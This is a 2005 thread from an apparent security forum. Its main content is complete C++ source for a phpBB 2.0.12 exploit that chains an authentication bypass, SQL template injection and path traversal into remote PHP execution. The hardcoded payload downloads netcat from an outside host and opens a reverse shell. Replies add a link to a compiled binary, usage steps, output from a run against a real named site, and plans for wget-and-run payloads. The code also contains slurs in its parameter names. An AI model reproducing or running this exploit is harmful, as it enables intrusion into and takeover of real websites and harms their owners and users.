Login or Register :: Home :: Search :: Your Account :: Forums :: Waraxe Advisories :: Tools :: November 14, 2024 Menu Home Logout Discussions Forums Members List IRC chat Tools Base64 coder MD5 hash CRC32 checksum ROT13 coder SHA-1 hash URL-decoder Sql Char Encoder Affiliates y3dips ITsec Md5 Cracker User Manuals AlbumNow Content Content Sections FAQ Top Info Feedback Recommend Us Search Journal Your Account User Info Welcome, Anonymous Nickname Password (Register) Membership: Latest: MichaelSnaRe New Today: 0 New Yesterday: 0 Overall: 9144 People Online: Visitors: 71 Members: 0 Total: 71 Full disclosure SEC Consult SA-20241112-0 :: Multiple vulnerabilities in Siemens Energy Omnivise T3000 (CVE-2024-38876, CVE-2024-38877, CVE-2024-38878, CVE-2024-38879) Security issue in the TX Text Control .NET Server for ASP.NET. SEC Consult SA-20241107-0 :: Multiple Vulnerabilities in HASOMED Elefant and Elefant Software Updater Unsafe eval() in TestRail CLI 4 vulnerabilities in ibmsecurity 32 vulnerabilities in IBM Security Verify Access xlibre Xnest security advisory & bugfix releases APPLE-SA-10-29-2024-1 Safari 18.1 SEC Consult SA-20241030-0 :: Query Filter Injection in Ping Identity PingIDM (formerly known as ForgeRock Identity Management) (CVE-2024-23600) SEC Consult SA-20241023-0 :: Authenticated Remote Code Execution in Multiple Xerox printers (CVE-2024-6333) APPLE-SA-10-28-2024-8 visionOS 2.1 APPLE-SA-10-28-2024-7 tvOS 18.1 APPLE-SA-10-28-2024-6 watchOS 11.1 APPLE-SA-10-28-2024-5 macOS Ventura 13.7.1 APPLE-SA-10-28-2024-4 macOS Sonoma 14.7.1 IT Security and Insecurity Portal www.waraxe.us Forum Index -> PhpBB -> phpBB User id Auth. Bypass and "admin_styles" Code Goto page 1, 2Next View previous topic :: View next topic phpBB User id Auth. Bypass and "admin_styles" Code Posted: Wed Mar 16, 2005 6:53 am LINUX Moderator Joined: May 24, 2004 Posts: 404 Location: Caiman Code: * coded by overdose phpbb <= 2.0.12 slythers@gmail.com C:\source\phpbbexp>bcc32 -c serv.cpp Borland C++ 5.5.1 for Win32 Copyright (c) 1993, 2000 Borland serv.cpp: Warning W8060 serv.cpp 77: Possibly incorrect assignment in function serveur::co nnectsocket(char *,unsigned short) C:\source\phpbbexp>bcc32 phpbbexp.cpp serv.obj Borland C++ 5.5.1 for Win32 Copyright (c) 1993, 2000 Borland phpbbexp.cpp: Turbo Incremental Link 5.00 Copyright (c) 1997, 2000 Borland C:\source\phpbbexp> je cherche un job au passage :> */ #include <iostream.h> #include <winsock.h> #include "serv.h" #define SHELL "$a=fopen(\"http://img58.exs.cx/img58/1584/nc4hk.swf\",\"r\"); $b=\"\";while(!feof($a)){$b%20.=%20fread($a,200000);};fclose($a); $a=fopen(\"/tmp/.sess_\",\"w\");fwrite($a,$b);fclose($a); chmod(\"/tmp/.sess_\",0777);system(\"/tmp/.sess_%20\".$_REQUEST[niggaip] .\"%20\".$_REQUEST[niggaport].\"%20-e%20/bin/sh\");" #define HTTP_PORT 80 #define DEFAULT_COOKIE "phpbb2mysql" #define SIGNATURE_SESSID "Set-Cookie: " #define BOUNDARY "----------g7pEbdXsWGPB7wRFGrqA1g" #define UP_FILE "------------g7pEbdXsWGPB7wRFGrqA1g\nContent-Disposition: form-data; name=\"restore_start\"\n\npetass\n------------g7pEbdXsWGPB7wRFGrqA1g\ nContent-Disposition: form-data; name=\"perform\"\n\nrestore\n------------g7pEbd XsWGPB7wRFGrqA1g\nContent-Disposition: form-data; name=\"backup_file\"; filename=\"phpbb_db_backup.sql\"\nContent-Type: text/sql\n\n" #define UP_FILE_END "\n------------g7pEbdXsWGPB7wRFGrqA1g--\n" #define EXP_TEMPLATES "mode=export&edit=Envoyer&export_template=" #define SIGNATURE_TABLE_NAME "DROP TABLE IF EXISTS " #define SIGNATURE_TABLE_NAME_END "_config;" #define SQL_TEMPLATES "DROP TABLE IF EXISTS " #define SQL_TEMPLATES_2 "_themes;\nCREATE TABLE " char *sql_templates_3 ="_themes(" "themes_id mediumint(8) unsigned NOT NULL auto_increment," "template_name varchar(150) NOT NULL," "style_name varchar(30) NOT NULL," "head_stylesheet varchar(100)," "body_background varchar(100)," "body_bgcolor varchar(6)," "body_text varchar(6)," "body_link varchar(6)," "body_vlink varchar(6)," "body_alink varchar(6)," "body_hlink varchar(6)," "tr_color1 varchar(6)," "tr_color2 varchar(6)," "tr_color3 varchar(6)," "tr_class1 varchar(25)," "tr_class2 varchar(25)," "tr_class3 varchar(25)," "th_color1 varchar(6)," "th_color2 varchar(6)," "th_color3 varchar(6)," "th_class1 varchar(25)," "th_class2 varchar(25)," "th_class3 varchar(25)," "td_color1 varchar(6)," "td_color2 varchar(6)," "td_color3 varchar(6)," "td_class1 varchar(25)," "td_class2 varchar(25)," "td_class3 varchar(25)," "fontface1 varchar(50)," "fontface2 varchar(50)," "fontface3 varchar(50)," "fontsize1 tinyint(4)," "fontsize2 tinyint(4)," "fontsize3 tinyint(4)," "fontcolor1 varchar(6)," "fontcolor2 varchar(6)," "fontcolor3 varchar(6)," "span_class1 varchar(25)," "span_class2 varchar(25)," "span_class3 varchar(25)," "img_size_poll smallint(5) unsigned," "img_size_privmsg smallint(5) unsigned," "PRIMARY KEY (themes_id)" ");"; #define SQL_FAKE_TEMPLATES "\nINSERT INTO " #define SQL_FAKE_TEMPLATES_2 "_themes (themes_id, template_name, style_name, head_stylesheet, body_background, body_bgcolor, body_text, body_link, body_vlink, body_alink, body_hlink, tr_color1, tr_color2, tr_color3, tr_class1, tr_class2, tr_class3, th_color1, th_color2, th_color3, th_class1, th_class2, th_class3, td_color1, td_color2, td_color3, td_class1, td_class2, td_class3, fontface1, fontface2, fontface3, fontsize1, fontsize2, fontsize3, fontcolor1, fontcolor2, fontcolor3, span_class1, span_class2, span_class3, img_size_poll, img_size_privmsg) VALUES(\'2\', \'" //template_name varchar(30) NOT NULL, #define FAKE_TEMPLATES_NAMES "aaa=12;eval(stripslashes($_REQUEST[nigga]));exit(); // /../../../../../../../../../../../../../../../../../../../tmp" #define SQL_FAKE_TEMPLATES_3 "\', \'FI Black\', \'fiblack.css\', \'\', \'\', \'\', \'\', \'\', \'\', \'\', \'\', \'\', \'\', \'\', \'\', \'\', \'\', \'\', \'\', \'\', \'\', \'\', \'\', \'\', \'\', \'row1\', \'row2\', \'\', \'\', \'\', \'\', \'0\', \'0\', \'0\', \'\', \'006699\', \'ffa34f\', \'cc\', \'bb\', \'a\', \'0\', \'0\');" #define SQL_FAKE_TEMPLATES_4 "_themes (themes_id, template_name, style_name, head_stylesheet, body_background, body_bgcolor, body_text, body_link, body_vlink, body_alink, body_hlink, tr_color1, tr_color2, tr_color3, tr_class1, tr_class2, tr_class3, th_color1, th_color2, th_color3, th_class1, th_class2, th_class3, td_color1, td_color2, td_color3, td_class1, td_class2, td_class3, fontface1, fontface2, fontface3, fontsize1, fontsize2, fontsize3, fontcolor1, fontcolor2, fontcolor3, span_class1, span_class2, span_class3, img_size_poll, img_size_privmsg) VALUES (\'1\', \'subSilver\', \'subSilver\', \'subSilver.css\',\'\', \'E5E5E5\', \'000000\', \'006699\', \'5493B4\', \'\', \'DD6900\', \'EFEFEF\', \'DEE3E7\', \'D1D7DC\', \'\', \'\', \'\', \'98AAB1\', \'006699\', \'FFFFFF\', \'cellpic1.gif\', \'cellpic3.gif\', \'cellpic2.jpg\', \'FAFAFA\', \'FFFFFF\', \'\', \'row1\', \'row2\', \'\', \'Verdana, Arial, Helvetica, sans-serif\', \'Trebuchet MS\', \'Courier, \\\'Courier New\\\', sans-serif\', \'10\', \'11\', \'12\', \'444444\', \'006600\', \'FFA34F\', \'\', \'\', \'\', NULL, NULL);" #define SQL_FAKE_TEMPLATES_5 "\nUPDATE " #define SQL_FAKE_TEMPLATES_6 "_config set config_value=\"1\" where config_name=\"default_style\";" struct url{ char *dns; char *uri; unsigned short port; }; struct url parseurl(char *of); char * intostr(int erf); void help(); int main(int argc,char *argv[]) { char buff[1024]; char sid[33]; char oct; char *cookiename; char *ptr; char *tablename = 0x00; char *phpcode = SHELL; bool flag; unsigned int longbeach; serveur http; struct url victim; WSAData wsadata; if(WSAStartup(MAKEWORD(2, 0),&wsadata) != 0) return 1; if(argc < 4) help(); cookiename= DEFAULT_COOKIE; sid[0] = '\0'; victim = parseurl(argv[1]); //detection du nom du cookie http.createsocket(); if(!http.connectsocket(victim.dns,victim.port)) return 0; http << "GET "; http << victim.uri; http << " HTTP/1.1\nHost: "; http << victim.dns; http << "\nReferer: "; http << argv[1]; http << "\nUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)\n Connection: close\n\n"; do{ if(!http.getline(buff,1023)) buff[0] = 0x00; if(!strncmp(buff,SIGNATURE_SESSID,sizeof(SIGNATURE_SESSID)-1)) { ptr = buff + sizeof(SIGNATURE_SESSID)-1; for(ptr; *ptr && (*ptr != '=');ptr++); *ptr= '\0'; ptr -= 4; if(!strncmp(ptr,"_sid",4)) { *ptr = '\0'; ptr = buff + sizeof(SIGNATURE_SESSID)-1; cookiename = new char[strlen(ptr)+1]; strcpy(cookiename,ptr); cout << "_ nom du cookie recuperer : "<<cookiename<<endl; buff[0] = '\0'; }; }; }while(buff[0]); http.closesock(); http.createsocket(); if(!http.connectsocket(victim.dns,victim.port)) return 0; //faille cookie uid http << "GET "; http << victim.uri; http << " HTTP/1.1\nHost: "; http << victim.dns; http << "\nCookie: "; http << cookiename; http << "_data=a%3A2%3A%7Bs%3A11%3A%22autologinid%22%3Bb%3A1%3Bs%3A6%3A%22 userid%22%3Bs%3A1%3A%222%22%3B%7D; expires=Fri, 24-Dec-2005 21:25:37 GMT; path=/; domain="; http << victim.dns; http << "\nReferer: "; http << argv[1]; http << "\nUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)\nConnection: close\n\n"; do{ if(!http.getline(buff,1023)) buff[0] = 0x00; if(!strncmp(buff,SIGNATURE_SESSID,sizeof(SIGNATURE_SESSID)-1)) { ptr = buff + sizeof(SIGNATURE_SESSID)-1; if((!strncmp(ptr,cookiename,strlen(cookiename))) && (!strncmp(&ptr[strlen(cookiename)],"_sid=",sizeof("_sid=")-1))) { ptr += strlen(cookiename) + sizeof("_sid=")-1; strncpy(sid,ptr,32); sid[32] = '\0'; }; }; }while(buff[0]); if(!sid[0]) { cout << "_ recuperation de l'identifiant de session a echouer"<<endl; return 0; }; cout << "_ SESSION ID recuper? ... "<<sid<<endl<<argv[1]<<"?sid="<<sid<<endl; http.closesock(); //recuperation du nom de la table http.createsocket(); if(!http.connectsocket(victim.dns,victim.port)) return 0; cout <<"_ recuperation du nom de la table sql ... "; http << "GET "; http << victim.uri; http << "admin/admin_db_utilities.php?perform=backup&additional_tables=&backup_type= structure&drop=1&backupstart=1&gzipcompress=0&startdownload=1&sid="; http << sid; http << " HTTP/1.1\nHost: "; http << victim.dns; http << "\nReferer: "; http << argv[1]; http << "\nUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)\nConnection: close\n\n"; flag = 1; while(flag) { flag = http.getline(buff,1023); if(!strncmp(buff,SIGNATURE_TABLE_NAME,sizeof(SIGNATURE_TABLE_NAME)-1)) { longbeach = strlen(buff); ptr = buff + longbeach - (sizeof(SIGNATURE_TABLE_NAME_END)-1); if(!strcmp(ptr,SIGNATURE_TABLE_NAME_END)) { flag = 0; *ptr= '\0'; ptr = buff + sizeof(SIGNATURE_TABLE_NAME) -1; tablename = new char[strlen(ptr)+1]; strcpy(tablename,ptr); }; }; }; http.closesock(); if(!tablename) { cout <<"can\'t find"<<endl; return 0; }; cout <<tablename << " OK"<<endl; cout << "_ Injection de la fake templates ..."; http.createsocket(); if(!http.connectsocket(victim.dns,victim.port)) return 0; http << "POST "; http << victim.uri; http << "admin/admin_db_utilities.php?sid="; http << sid; http << " HTTP/1.1\nHost: "; http << victim.dns; http << "\nReferer: "; http << argv[1]; http << "\nUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)\nConnection: close, TE\r\nTE: deflate, chunked, identify, trailers\r\nCache-Control: no-cache\r\nContent-Type: multipart/form-data; boundary=" BOUNDARY "\nContent-Length: "; http << intostr(strlen(sql_templates_3)+sizeof(SQL_TEMPLATES)-1+sizeof(SQL_TEMPLATES_2)-1+sizeof (SQL_FAKE_TEMPLATES)-1+strlen(tablename)+sizeof(SQL_FAKE_TEMPLATES_2)-1+sizeof (FAKE_TEMPLATES_NAMES)-1+sizeof(SQL_FAKE_TEMPLATES_3)-1+sizeof(SQL_FAKE_TEMPLATES)-1+ strlen(tablename)+sizeof(SQL_FAKE_TEMPLATES_4)-1+sizeof(SQL_FAKE_TEMPLATES_5)-1+ strlen(tablename)+sizeof(SQL_FAKE_TEMPLATES_6)-1+sizeof(UP_FILE_END)-1+sizeof(UP_FILE)); http << "\n\n" UP_FILE SQL_TEMPLATES; http << tablename; http << SQL_TEMPLATES_2; http << tablename; http << sql_templates_3; http << SQL_FAKE_TEMPLATES; http << tablename; http << SQL_FAKE_TEMPLATES_4 SQL_FAKE_TEMPLATES_5; http << tablename; http << SQL_FAKE_TEMPLATES_6 SQL_FAKE_TEMPLATES; http << tablename; http << SQL_FAKE_TEMPLATES_2 FAKE_TEMPLATES_NAMES SQL_FAKE_TEMPLATES_3 UP_FILE_END ; while(http.getnb(&oct,sizeof(char))); cout <<"OK"<<endl; ptr = new char[sizeof(FAKE_TEMPLATES_NAMES)]; strcpy(ptr,FAKE_TEMPLATES_NAMES); for(int cpt = 0; ptr[cpt]!= '\0';cpt++) { if(ptr[cpt] == ' ') ptr[cpt] = '+'; }; //creation de la page dans /tmp http.closesock(); http.createsocket(); if(!http.connectsocket(victim.dns,victim.port)) return 0; http << "POST "; http << victim.uri; http << "admin/admin_styles.php?mode=export&sid="; http << sid; http << " HTTP/1.1\nHost: "; http << victim.dns; http << "\nReferer: "; http << argv[1]; http << "admin/admin_styles.php?mode=export\nUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)\nConnection: close\nContent-Type: application/x-www-form-urlencoded\nContent-Length: "; http << intostr(strlen(ptr)+sizeof(EXP_TEMPLATES)-1); http << "\n\n"; http << EXP_TEMPLATES; http << ptr; while(http.getnb(&oct,sizeof(char))); cout << "_ Fichier cr?e"<<endl; //appelle de la page avec le code php http.closesock(); http.createsocket(); if(!http.connectsocket(victim.dns,victim.port)) return 0; http << "GET "; http << victim.uri; http << "admin/admin_styles.php?mode=addnew&install_to=../../../../../../../../../../../../../../../../../../../tmp&sid="; http << sid; http << "&niggaip="; http << argv[2]; http << "&niggaport="; http << argv[3]; http << "&nigga="; http << phpcode; http << " HTTP/1.1\nHost: "; http << victim.dns; http << "\nReferer: "; http << argv[1]; http << "\nUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)\nConnection: close\n\n"; while(http.getnb(&oct,sizeof(char))); cout << "_ Code execut?"<<endl<<argv[1]<<"admin/admin_styles.php?mode=addnew&install_to =../../../../../../../../../../../../../../../../../../../tmp&nigga=phpinfo();&sid="<<sid<<endl; delete[] ptr; return 0; } struct url parseurl(char *of) { struct url retour; unsigned int taille; char tmp; retour.dns = 0x00; retour.uri = 0x00; retour.port = HTTP_PORT ; while( *of && (*of != ':')) of++; if(*of && *(of+1) && *(of+2)) { if((*(of+1) != '/') || (*(of+2) != '/')) return retour; of += 3; for(taille = 0; (of[taille] != '/') && (of[taille] != '\0') && (of[taille] != ':');taille++); retour.dns = new char [taille+1]; memcpy(retour.dns,of,taille); retour.dns[taille] = '\0'; of += taille; if(*of == ':') { of++; for(taille = 0; (of[taille] != '/') && (of[taille] != '\0');taille++); tmp = of[taille]; of[taille] = '\0'; if(taille) retour.port = atoi(of); of[taille] = tmp; of += taille; }; if(!*of) { retour.uri = new char[2]; strcpy(retour.uri,"/"); } else { retour.uri = new char [strlen(of)+1]; strcpy(retour.uri,of); }; }; return retour; } char * intostr(int erf) { char *chaine; int puissance; int erf2; if( erf >= 0) { puissance =0; for(int kekette = 1;kekette<=erf;kekette = kekette*10) { puissance++; }; if (puissance == 0) { puissance = 1; }; chaine = new char[puissance+1]; chaine[puissance] ='\0'; for(int arf = puissance-1;arf >=0;arf--) { erf2 = erf % 10 ; chaine[arf] = '0' + erf2; erf = erf /10; }; return chaine; } else return 0; } void help() { cout << "phpbbexp.exe http://site.com/phpbb/ [backshell ip] [backshell port]"<<endl; cout << "coded by Malloc(0) Wicked Attitude"<<endl; cout << "phpbb <= 2.0.12 uid vuln + admin_styles.php exploit"<<endl; exit(0); } compiled exploit > http://overdose.tcpteam.org/phpbbexp.exe = http://overdose.tcpteam.org/phpbbexp.rar Posted: Wed Mar 16, 2005 12:29 pm KingOfSka Advanced user Joined: Mar 13, 2005 Posts: 61 sound beutiful but it doesn't work on my test forum... has someone tryied it ? Posted: Wed Mar 16, 2005 1:25 pm LINUX Moderator Joined: May 24, 2004 Posts: 404 Location: Caiman KingOfSka wrote: sound beutiful but it doesn't work on my test forum... has someone tryied it ? yes work nice, use netcat for listen in one port and run xpl first one cmd : netcat listen port 6666 second : exploit htttp://www.victim.com/phpbb youip youport copy and paste link in the cmd and go to you browser direct admin or copy and paste very large link and change phpinfo() for system(id) english ..... xD Posted: Wed Mar 16, 2005 2:53 pm KingOfSka Advanced user Joined: Mar 13, 2005 Posts: 61 i already tryied it... could it be that this exploit works only on some server ? *edit: if someones wants to try, http://skarulez.altervista.org/phpbb2.0.10/ , it's a test forum i put up, as you can see many people have already tested various exploit Posted: Wed Mar 16, 2005 3:05 pm O.T.M Regular user Joined: Mar 11, 2005 Posts: 8 how to use this just compile and run? but how run (port server ip) like this exploit.exe 200.1.1.200 100 exploit name ip port how? _________________ ___________________________ |I Want To Learn Sql Injection!!! | |__________________________| Posted: Wed Mar 16, 2005 3:42 pm KingOfSka Advanced user Joined: Mar 13, 2005 Posts: 61 LINUX wrote: KingOfSka wrote: sound beutiful but it doesn't work on my test forum... has someone tryied it ? yes work nice, use netcat for listen in one port and run xpl first one cmd : netcat listen port 6666 second : exploit htttp://www.victim.com/phpbb youip youport copy and paste link in the cmd and go to you browser direct admin or copy and paste very large link and change phpinfo() for system(id) english ..... xD he said all Posted: Wed Mar 16, 2005 4:10 pm LINUX Moderator Joined: May 24, 2004 Posts: 404 Location: Caiman ok now i think redevelop this exploit, original exploit only its posible exec one cmd command for example sytem(id) or system(uname) but not is possible exec (uname -a) (wget www.a.a) ect, . Correct exploit need make a function in php what this not generate space for use an function system() for correct use system(uname -a;wget www.a.a/root;chmod -c 777 root;./root; SH xD i listen ideas now i develop this remember my english not is very good Posted: Wed Mar 16, 2005 4:53 pm zer0-c00l Advanced user Joined: Jun 25, 2004 Posts: 72 Location: BRAZIL! someone can put the .exe in ftp? i can't compile it here Posted: Thu Mar 17, 2005 5:09 am y3dips Valuable expert Joined: Feb 25, 2005 Posts: 281 Location: Indonesia zer0-c00l wrote: someone can put the .exe in ftp? i can't compile it here LINUX wrote the link to an exe files, u can donlod it from there Compiled exploit > http://overdose.tcpteam.org/phpbbexp.exe = http://overdose.tcpteam.org/phpbbexp.rar _________________ IO::y3dips->new(http://clog.ammar.web.id); Posted: Thu Mar 17, 2005 6:17 am LINUX Moderator Joined: May 24, 2004 Posts: 404 Location: Caiman y3dips wrote: zer0-c00l wrote: someone can put the .exe in ftp? i can't compile it here LINUX wrote the link to an exe files, u can donlod it from there Compiled exploit > http://overdose.tcpteam.org/phpbbexp.exe = http://overdose.tcpteam.org/phpbbexp.rar men all links work nice you need the source code ? my friends in canada and russia redevelop exploit finish this day and i share dont worry Posted: Thu Mar 17, 2005 6:00 pm O.T.M Regular user Joined: Mar 11, 2005 Posts: 8 O.T.M wrote: how to use this just compile and run? but how run (port server ip) like this exploit.exe 200.1.1.200 100 exploit name ip port how? _________________ ___________________________ |I Want To Learn Sql Injection!!! | |__________________________| Posted: Thu Mar 17, 2005 7:55 pm zer0-c00l Advanced user Joined: Jun 25, 2004 Posts: 72 Location: BRAZIL! why netcat? the xpl returns to me: C:\Documents and Settings\Windows\Desktop>phpbbexp XXXXXXXX *********** 1337 _ nom du cookie recuperer : phpbb2mysql _ SESSION ID recuper? ... 85f90d4021c5dbaf24f8cf39d255a6d9 http://www.sbfisica.org.br/phpBB2/?sid=85f90d4021c5dbaf24f8cf39d255a6d9 _ recuperation du nom de la table sql ... phpbb_ OK _ Injection de la fake templates ...OK _ Fichier cr?e _ Code execut? xxxxxxxxxxxxxxxxxxxx/admin/admin_styles.php?mode=addnew&install_to= ../../../../../../../../../../../../../../../../../../../tmp&nigga=phpinfo();&si d=85f90d4021c5dbaf24f8cf39d255a6d9 ok, i enter in this URL and i got in admin panel, its ok but the netcat stills in 'listen' :S Posted: Sun Mar 20, 2005 4:24 pm Injector Active user Joined: Dec 29, 2004 Posts: 49 does this exploit mean dat you have a shell access on d site? Posted: Mon Mar 21, 2005 12:58 pm shai-tan Valuable expert Joined: Feb 22, 2005 Posts: 477 Thats good work man.... _________________ Shai-tan ?In short: just say NO TO DRUGS, and maybe you won?t end up like the Hurd people.? -- Linus Torvalds Posted: Tue Mar 22, 2005 1:48 pm murdock Advanced user Joined: Mar 16, 2005 Posts: 54 I think the compiled version won't work. You need to change the url on this part of code: Code: #define SHELL "$a=fopen(\"http://img58.exs.cx/img58/1584/nc4hk.swf\",\"r\"); $b=\"\";while(!feof($a)){$b%20.=%20fread($a,200000);};fclose($a); $a=fopen(\"/tmp/.sess_\",\"w\");fwrite($a,$b);fclose($a); chmod(\"/tmp/.sess_\",0777);system(\"/tmp/.sess_%20\".$_REQUEST[niggaip] .\"%20\".$_REQUEST[niggaport].\"%20-e%20/bin/sh\");" This url is pointing to a compiled linux netcat, you need to change to a valid URL because these one no longer exists! I changed it but I can't compile it because I don't have de "serv.h" header file, can anyone send me this file? Thanks! Salud! Last edited by murdock on Tue Mar 22, 2005 7:06 pm; edited 1 time in total phpBB User id Auth. Bypass and "admin_styles" Code www.waraxe.us Forum Index -> PhpBB You cannot post new topics in this forum You cannot reply to topics in this forum You cannot edit your posts in this forum You cannot delete your posts in this forum You cannot vote in polls in this forum All times are GMT Page 1 of 2 Goto page 1, 2Next All Posts1 Day7 Days2 Weeks1 Month3 Months6 Months1 YearOldest FirstNewest First Select a forumSecurity Research by waraxe----------------General discussionHow to fixMetasploit relatedHash cracking requests----------------MD5 hashesAll other hashesHash related informationhttp://www.waraxe.us portal----------------SuggestionsCooperation proposalsSecurity bugs and issues in general----------------Newbies cornerSql injectionCross-site scripting aka XSSRemote file inclusionFull path disclosureShell commands injectionPhishing and Social EngineeringAll other security holesVarious software----------------PhpNukePostNukePhpBBXMB forumvBulletin BoardInvision Power Boarde107MamboJoomlaXOOPSM$ WindowsLinux worldAll other softwareCoppermine Photo GalleryProgramming languages----------------PhpMySqlPerlJavaJavascriptC and C++Visual BasicBorland Delphi and PascalPythonHTML and XMLAssemblerReverse engineering----------------Newbies cornerDisassemblingPHP script decode requestsMiscellaneous stuff----------------Future of the ITNanotechnologyFun cornerLinksTry2hack sitesProxy databaseDirect Downloads----------------ToolsTutorialsWordlistsRecycle Bin----------------Removed messagesOutdated posts Powered by phpBB © 2001-2008 phpBB Group

Space Raider game for Android, free download - Space Raider gameplay video - Zone Raider mobile games
All logos and trademarks in this site are property of their respective owner. The comments and posts are property of their posters, all the rest (c) 2004-2024 Janek Vind "waraxe"
Page Generation: 0.053 Seconds